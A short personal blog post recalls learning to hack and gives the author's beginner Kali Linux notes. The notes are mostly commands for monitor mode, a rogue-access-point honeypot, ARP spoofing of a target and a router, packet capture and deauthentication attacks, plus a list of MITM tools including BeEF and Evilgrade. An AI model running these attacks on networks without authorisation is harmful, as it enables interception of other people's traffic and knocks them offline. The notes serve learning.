KaliLinux

When I started my journey in IT, it felt like there was so much to learn. There was so much magic to uncover, there was no way anyone could possibly understand all of this. It seemed daunting.

But in another real sense it also felt really tractable with all the different abstraction layers seemingly well defined. This gave me confidence to know exactly where I wanted to start. I remember getting hooked with the question of exactly what is ‘hacking’?

You can make other people's computers do things without their permission? How?

After a couple of hot summer days spent indoors on Twitter and YouTube, I discovered Kali Linux. Back then it felt like finding free mason trade secrets.

Below are some of my notes from that first summer of finding Kali Linux.

Update Kali:
apt update && apt full-upgrade

Monitor mode:
Ifconfig wlan0 down
Iwconfig wlan0 mode monitor
Ifconfig wlan0 up

Create a honeypot:
bash /usr/share/mana-toolkit/run-mana/start-nat-simple.sh

Post-connection tools:

NetDiscover - Discover devices on your network
Apt-get update
Netdiscover -r [IP range(10.0.2.0/24)]
patience(~60sec)

Arp spoof:
Tell the target I am the router:
Arpspoof -i wlan0 -t [target IP] [AP IP]
Tell router I am the target:
Arpspoof -i wlan0 -t [AP IP] [target IP]

Aireplay-ng
Airodump packet capture(specific ap):
Airodump-ng (--bssid [mac address] --channel [#]) wlan0

Deauth attack:
aireplay-ng --deauth [# of deauth packets] -a [access point mac address] -c [client mac address] wlan0
aireplay-ng --deauth 10000 -c FC:C2:DE:25:3C:F6 -a 38:70:0C:F3:68:C8 wlan0

Bettercap:
Arp spoofing
Deauth attacks
Other modules

Other Tools:
Wifite -i wlan0
Metasploit
Burp Suite

MITM:
mitmf
BeEF - Browser exploitation
Evilgrade - Update server spoof with backdoor